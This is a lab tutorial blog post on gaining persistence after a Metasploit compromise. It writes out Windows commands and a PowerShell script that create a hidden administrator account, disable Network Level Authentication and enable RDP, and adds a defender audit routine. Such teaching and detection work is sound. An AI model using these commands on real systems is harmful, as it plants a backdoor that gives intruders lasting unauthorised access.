Creating a Cyber Attack – Part 7 (Post Exploitation – Gaining Persistence)

In this video we continue with post exploitation using Metasploit and Meterpreter, but this time using native Windows commands to gain persistence. We start from our Meterpreter shell, drop to a Windows cmd prompt and run built-in commands to enumerate shares and users. We then create a new user, add it to the groups that grant remote access and administrative rights, and enable RDP with Network Level Authentication switched off, so the account can be used to get back in later with weaker authentication controls in the way.

If you have not read the previous guides or watched the videos, I recommend taking a look, as all the steps are shown and explained in detail; if you are not sure about something shown here, go back and read the previous guides.

Don't forget, for an attacker information is key. The more they know, the better equipped they are to find a chink in the security of the defender's network.

As with this entire series, the attacker machine is on the right with the victim on the left.

Commands used in this video are;

  • net share
  • net user
  • net user secretuser £@55w.rd /add
  • net localgroup "Administrators" secretuser /add
  • net localgroup "Remote Desktop Users" secretuser /add
  • reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
  • netsh firewall set service type = remotedesktop mode = enable
  • reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Let’s jump in

We start from our Meterpreter prompt and drop into a Windows command prompt with the shell command.

Used without parameters, net share lists every resource shared on the local computer. We see three shared locations, including the "Network Share". This would be a good place to start any file searches for "passwords", "payment" and the like.

Used without parameters, net user lists all of the user accounts on the local computer. We can see the six currently on the victim; this will soon be seven.

Let's create a new user named "secretuser" with the password "£@55w.rd". In the real world an attacker will name the account to blend in with the existing ones: they will follow your naming standard and make sure it does not stand out.

The command completes successfully and on the victim machine we can see the new account. A standard user account is not much use to us at this point, so we add it to groups that give us remote access and higher privileges: "Administrators" and "Remote Desktop Users". Members of the local Administrators group already hold the right to log on through Remote Desktop by default, so the second group is belt and braces; it is the Administrators membership that does the real work.

Both complete successfully and we again confirm on the victim machine.

To enable RDP we need to run three commands. In the order listed, the first disables Network Level Authentication (UserAuthentication = 0), the second opens the firewall for Remote Desktop, and the third enables RDP itself (fDenyTSConnections = 0). Note the space in "Terminal Server": reg add creates any key that does not already exist, so a mistyped path completes "successfully" while changing nothing.

  • reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
  • netsh firewall set service type = remotedesktop mode = enable
  • reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

All complete successfully (netsh does warn that the netsh firewall context is deprecated in favour of netsh advfirewall, so I need to update myself on the newer syntax), so let's test our connection.

and test our new login account.

We manage to log in successfully (at the second attempt lol), but we would not want to kick off another user, as this would raise suspicion, so we just close the connection for now. On client editions of Windows only one interactive session is allowed, so an RDP logon disconnects whoever is sitting at the console, which is exactly the kind of thing that gets reported.
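As an added example, not part of the original video or post, here is the whole procedure from this part in a single PowerShell script with the registry paths corrected, the deprecated netsh firewall command replaced by its netsh advfirewall equivalent, and a read-only check that shows a defender exactly what these steps leave behind. It assumes an elevated PowerShell 3 or later on Windows 7 / Server 2008 R2 or later (the Meterpreter session is already running as SYSTEM or a local administrator); the account name and password are the ones used in the video, and the function names are my own.

```powershell
# Added example, not code from the original post. Assumes elevated PowerShell 3+
# on Windows 7 / Server 2008 R2 or later. Function names are this example's own;
# the user name and password are the ones used in the video.

$TsKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'   # note the space
$RdpTcp = Join-Path $TsKey 'WinStations\RDP-Tcp'

function New-PersistenceUser {
    param(
        [string]$Name     = 'secretuser',
        [string]$Password = '£@55w.rd'
    )
    # Same native commands the video types into cmd.exe.
    net user $Name $Password /add | Out-Null
    # Local Administrators already hold the "Allow log on through Remote Desktop
    # Services" right; the second group is added only to mirror the video.
    net localgroup Administrators $Name /add | Out-Null
    net localgroup 'Remote Desktop Users' $Name /add | Out-Null
}

function Enable-RdpAccess {
    param([switch]$DisableNla)
    # fDenyTSConnections = 0 switches Remote Desktop on. reg add / Set-ItemProperty
    # would silently create a mistyped key such as "TerminalServer", so the path
    # is built once above and reused.
    Set-ItemProperty -Path $TsKey -Name fDenyTSConnections -Type DWord -Value 0
    if ($DisableNla) {
        # UserAuthentication = 0 turns Network Level Authentication off, exposing
        # the full logon screen before any credential is checked.
        Set-ItemProperty -Path $RdpTcp -Name UserAuthentication -Type DWord -Value 0
    }
    # Replacement for the deprecated "netsh firewall set service type = remotedesktop
    # mode = enable". --% hands the rest of the line to netsh untouched.
    netsh --% advfirewall firewall set rule group="remote desktop" new enable=Yes
}

function Get-LocalGroupMembers {
    param([string]$Group)
    # ADSI WinNT provider: works on every Windows version, unlike Get-LocalGroupMember.
    $adsiGroup = [ADSI]"WinNT://./$Group,group"
    foreach ($member in $adsiGroup.Invoke('Members')) {
        $member.GetType().InvokeMember('Name', 'GetProperty', $null, $member, $null)
    }
}

function Get-RdpPersistenceIndicators {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)
    [pscustomobject]@{
        RdpEnabled   = (Get-ItemProperty -Path $TsKey  -Name fDenyTSConnections -ErrorAction SilentlyContinue).fDenyTSConnections -eq 0
        NlaDisabled  = (Get-ItemProperty -Path $RdpTcp -Name UserAuthentication  -ErrorAction SilentlyContinue).UserAuthentication -eq 0
        Admins       = Get-LocalGroupMembers 'Administrators'
        RdpUsers     = Get-LocalGroupMembers 'Remote Desktop Users'
        # 4720 = user account created, 4732 = member added to a security-enabled local group.
        RecentEvents = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720, 4732; StartTime = $since } -ErrorAction SilentlyContinue |
                       Select-Object TimeCreated, Id, @{ Name = 'Summary'; Expression = { ($_.Message -split "`r?`n")[0] } }
    }
}

# Attacker side as performed in the video (commented out: both create a backdoor):
# New-PersistenceUser
# Enable-RdpAccess -DisableNla

# Defender side: read-only, shows what the steps above leave behind.
Get-RdpPersistenceIndicators -Hours 24 | Format-List
```

Run as-is the script only audits: it reports whether RDP is on, whether NLA has been switched off, who sits in the two groups, and any account-creation or group-membership events from the last day. Uncomment the two attacker-side calls to reproduce the video on a lab machine; every one of those calls shows up in the audit output, which is the point.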

In the next post we continue with the last video in this series.